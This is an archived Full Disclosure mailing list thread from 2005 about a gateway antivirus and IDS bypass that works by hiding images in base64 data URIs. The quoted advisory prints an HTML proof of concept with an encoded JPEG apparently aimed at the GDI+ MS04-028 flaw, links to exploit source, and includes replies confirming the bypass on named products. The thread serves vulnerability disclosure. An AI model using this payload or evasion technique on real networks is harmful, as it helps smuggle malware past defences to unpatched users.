Full Disclosure mailing list archives

Re: Multi-vendor AV gateway image inspection bypass vulnerability

From: Steven Rakick <stevenrakick () yahoo com>
Date: Tue, 11 Jan 2005 18:56:00 -0800 (PST)

At this point I have no choice by to agree. 

So far I've had an opportunity to test this with Check
Point Interspect and McAfee IntruShield. Like you
said, (in my lab) both detected and block the
malicious image when it was formatted without RFC
2397, but when base64 encoded they were downloaded and
excuted there attack.

Basically it's looking like no security companies are
looking at data formatted in this fashion. I'm not
sure but it seems like you can probably transfer
anything you'd like by just changing the content type
and your anti-virus, IDS, application firewall or
whatever you're using at the network level would be
completely oblivious.






On Tue, 11 Jan 2005 14:58:43 -0500, Darren Bounds
<lists () intrusense com> wrote:

Hello Danny,

This vulnerability is only applicable to the HTTP

data while in

transit. Once received by the client the image will

be rendered and

subsequently detected if local AV software.

At the present time, I'm not aware of any AV, IDS or

IPS vendor that

will detect malicious images imbedded in HTML in

this manner.



Thank you,

Darren Bounds
Intrusense, LLC.

--
Intrusense - Securing Business As Usual

On Jan 11, 2005, at 2:14 PM, Danny wrote:

On Mon, 10 Jan 2005 14:08:11 -0500, Darren Bounds
<dbounds () intrusense com> wrote:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Multi-vendor AV gateway image inspection bypass

vulnerability

January 10, 2005

A vulnerability has been discovered which allows

a remote attacker to

bypass anti-virus
(as well other security technologies such as IDS

and IPS) inspection

of
HTTP image content.

By leveraging techniques described in RFC 2397

for base64 encoding

image content within
the URL scheme. A remote attack may encode a

malicious image within

the
body of an HTML
formatted document to circumvent content

inspection.


For example:

http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.php


The source code at the URL above will by default

create a JPEG image

that will attempt (and fail
without tweaking) to exploit the Microsoft

MS04-028 GDI+

vulnerability.
The image itself is detected
by all AV gateway engines tested (Trend, Sophos

and McAfee), however,

when the same image
is base64 encoded using the technique described

in RFC 2397

(documented
below), inspection
is not performed and is delivered rendered by the

client.


While Microsoft Internet Explorer does not

support the RFC 2397 URL

scheme; Firefox, Safari,
Mozilla and Opera do and will render the data and

thus successfully

execute the payload if the necessary
OS and/or application patches have not been

applied.


## BEGIN HTML ##

<html>
<body>
<img

src="data:image/gif;base64,/9j/4AAQSkZJRgABAQEAYABgAAD//

gAARXhpZgAASUkqAAgAHPD9f0FBQUGWAgAAGgAAABzw
/

X9BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF

QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU

FB

QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU

FB

QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU

FB

QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU

FB

QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU

FB

QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU

FB

QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU

FB

QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU

FB

QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU

FB

QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU

FB

QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU

FB

QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU

FB

QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU

FB

QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU

FB

QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU

FB

QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU

FB

QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU

FB

QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQAAAP/

bAEMACAYGBwYFCAcHBwkJ

CAoMFA0MCwsMGRITDxQdGh8eHRocHCAkLicgIiwjHBwoNyksMDE0NDQfJzk9ODI8LjM0Mv

/b

AEMBCQkJDAsMGA0NGDIhHCEyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj

Iy
MjIyMjIyMjIyMjIyMv/AABEIAAMAAwMBIgACEQEDEQH/
xAAfAAABBQEBAQEBAQAAAAAAAAAA
AQIDBAUGBwgJCgv/

xAC1EAACAQMDAgQDBQUEBAAAAX0BAgMABBEFEiExQQYTUWEHInEUMoGR

oQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2

Rl

ZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExc

bH
yMnK0tPU1dbX2Nna4eLj5OXm5+jp6vHy8/T19vf4+fr/
xAAfAQADAQEBAQEBAQEBAAAAAAAA
AQIDBAUGBwgJCgv/

xAC1EQACAQIEBAMEBwUEBAABAncAAQIDEQQFITEGEkFRB2FxEyIygQgU

QpGhscEJIzNS8BVictEKFiQ04SXxFxgZGiYnKCkqNTY3ODk6Q0RFRkdISUpTVFVWV1hZWm

Nk

ZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8

TF

xsfIycrS09TV1tfY2dri4+Tl5ufo6ery8/T19vf4+fr/2gAMAwEAAhEDEQA/

APn+iiigD//
Z">
</body>
</html>

## END HTML ##

Solution:

While AV vendor patches are not yet available,

fixes for all currently

known image vulnerabilities are
and have been for several months.  If you have

not yet applied them,

you have your own
negligence to blame.

Contributions:

Thanks to Scott Roeder and Jacinto Rodriquez

their assistance in

platform testing.


I believe TrendMicro's OfficeScan (client-server

scanner) will catch

it, but I am not sure about their gateway device.

What was their

response?

...D


_______________________________________________
Full-Disclosure - We believe in it.
Charter:

http://lists.netsys.com/full-disclosure-charter.html



=====


__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

Multi-vendor AV gateway image inspection bypass vulnerability Darren Bounds (Jan 10)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Jeff Gillian (Jan 11)
  - Re: Multi-vendor AV gateway image inspection bypass vulnerability - KMail Noam Rathaus (Jan 12)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Danny (Jan 11)
  - Re: Multi-vendor AV gateway image inspection bypass vulnerability Darren Bounds (Jan 11)
- <Possible follow-ups>
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Steven Rakick (Jan 11)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Steven Rakick (Jan 12)
  - Re: Multi-vendor AV gateway image inspection bypass vulnerability Nils Ketelsen (Jan 12)
  - Re: Multi-vendor AV gateway image inspection bypass vulnerability Frank Knobbe (Jan 12)
    - Re: Multi-vendor AV gateway image inspection bypass vulnerability Steven Rakick (Jan 12)
    - Re: Multi-vendor AV gateway image inspection bypass vulnerability Frank Knobbe (Jan 12)